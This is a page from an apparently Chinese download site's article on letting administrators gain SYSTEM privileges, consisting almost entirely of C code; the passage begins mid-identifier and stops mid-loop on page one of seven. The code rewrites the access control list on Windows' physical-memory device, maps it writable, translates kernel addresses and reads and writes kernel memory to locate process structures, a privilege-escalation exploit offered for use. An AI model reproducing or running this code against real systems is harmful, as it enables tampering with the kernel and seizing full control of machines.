首 页下载中心文章中心最新更新软件分类热门软件推荐下载绿色软件特别软件客户留言繁體中文
  网络软件 | 系统工具 | 应用软件 | 聊天联络 | 图形图像 | 多媒体类 | 安全相关 | 教育教学 | 游戏娱乐 | 行业软件 | 编程开发
文章中心: 业界资讯 | 软件技术 | 设计学院 | 网络学院 | 硬件技术 | 游戏娱乐 | 编程开发 | 公文写作 | 业界新闻 | 安全资讯 | 软硬资讯

实用专题OICQ专区 MSN专区 主页浏览 影音播放 系统优化 办公专区 杀软专区 木马防范 流氓清除 黑软专区 设计专区 压缩解压 下载工具 P2P工具专区 输入法专区

您当前的位置:JZ5U绿色下载站文章中心网络学院建站心得 → 文章内容

  • 管理员组获取系统权限的完美解决方案

ULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;

BOOL InitNTDLL()
{
g_hNtDLL = LoadLibrary( "ntdll.dll" );
if ( !g_hNtDLL )
{
return FALSE;
}

RtlInitUnicodeString =
(RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");

ZwOpenSection =
(ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

ZwQuerySystemInformation =
( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );

ZwQuerySystemInformation =
( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );

return TRUE;
}

VOID CloseNTDLL()
{
if(g_hNtDLL != NULL)
{
FreeLibrary(g_hNtDLL);
}
}

VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{

PACL pDacl=NULL;
PACL pNewDacl=NULL;
PSECURITY_DESCRIPTOR pSD=NULL;
DWORD dwRes;
EXPLICIT_ACCESS ea;

if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS)
{
goto CleanUp;
}

ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";


if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)
{
goto CleanUp;
}

if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)
{
goto CleanUp;
}

CleanUp:

if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}

HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;

RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );

attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;

status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);

if(status == STATUS_ACCESS_DENIED){
status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
}

if( !NT_SUCCESS( status ))
{
return NULL;
}

g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4,
0,
0x30000,
0x1000);
if( g_pMapPhysicalMemory == NULL )
{
return NULL;
}

return g_hMPM;
}

PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)
{
ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
if(VAddr>=0x80000000 && VAddr<0xa0000000)
{
PAddr=VAddr-0x80000000;
return (PVOID)PAddr;
}
PGDE=BaseAddress[VAddr>>22];
if ((PGDE&1)!=0)
{
ULONG tmp=PGDE&0x00000080;
if (tmp!=0)
{
PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);
}
else
{
PGDE=(ULONG)MapViewOfFile(g_hMPM, FILE_MAP_ALL_ACCESS, 0, PGDE & 0xfffff000, 0x1000);
PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if ((PTE&1)!=0)
{
PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
else return 0;
}
}
else return 0;

return (PVOID)PAddr;
}

ULONG GetData(PVOID addr)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return 0;
ULONG ret=tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}

BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return FALSE;
tmp[(phys & 0xFFF)>>2]=data;
UnmapViewOfFile(tmp);
return TRUE;
}

DWORD MyGetModuleBaseAddress( char * pModuleName)
{
PSYSTEM_MODULE_INFORMATION pSysModule;

ULONG uReturn;
ULONG uCount;
PCHAR pBuffer = NULL;
PCHAR pName = NULL;
NTSTATUS status;
UINT ui;
CHAR szBuffer[10];
DWORD pBaseAddress;

status = ZwQuerySystemInformation( SystemModuleInformation, szBuffer, 10, &uReturn );
pBuffer = ( PCHAR )malloc(uReturn);
if ( pBuffer )
{
status = ZwQuerySystemInformation( SystemModuleInformation, pBuffer, uReturn, &uReturn );
if( NT_SUCCESS(status) )
{
uCount = ( ULONG )*( ( ULONG * )pBuffer );
pSysModule = ( PSYSTEM_MODULE_INFORMATION )( pBuffer + sizeof( ULONG ) );
for ( ui = 0; ui < uCount; ui++ )
{
pName = strstr( pSysModule->ImageName, pModuleName );
if( pName )
{
pBaseAddress = (DWORD)pSysModule->Base;
free( pBuffer );
return pBaseAddress;
}
pSysModule ++;
}
}

free( pBuffer );
}

return NULL;
}

DWORD GetEprocessFromId (DWORD PID)
{
NTSTATUS status;
PVOID buf = NULL;
ULONG size = 1;
ULONG NumOfHandle = 0;
ULONG i;
PSYSTEM_HANDLE_INFORMATION h_info = NULL;
DWORD n;
DWORD retvalue=0;

buf=malloc(0x1000);
if(buf == NULL)
{
printf("malloc wrong\n");
return FALSE;
}
status = ZwQuerySystemInformation( SystemHandleInformation, buf, 0x1000, &n );
if(STATUS_INFO_LENGTH_MISMATCH == status)
{
free(buf);
buf=malloc(n);
if(buf == NULL)
{
printf("malloc wrong\n");
return FALSE;
}
status = ZwQuerySystemInformation( SystemHandleInformation, buf, n, NULL);
}
else
{
printf("ZwQuerySystemInformation wrong\n");
return FALSE;
}

NumOfHandle = *(ULONG*)buf;

h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);

for(i = 0

上一页  [1] [2] [3] [4] [5] [6] [7]  下一页


  • 作者:不详  来源:建站无忧(www.jz5u.com)  发布时间:2005-9-3 23:01:18

----------------------------------The End Of Jz5u' Article---------------------------------- 以下是评论:【发表评论
------------------------------- · 相关文档浏览 · --------------------------------------------------------------------- · 热门文档浏览 · -------------------------------------

关于本站 - 网站帮助 - 广告合作 - 本站声明 - 友情连接 - 网站地图 - RSS2.0
网站管理QQ:512821538 | Email:zarong⊙gmail.com | 浙ICP备06003586号
别忘了把"JZ5U下载站"介绍给您的朋友们喔
Copyright(C)2005-2008《JZ5U下载站》jz5u.com 本主页保留所有权利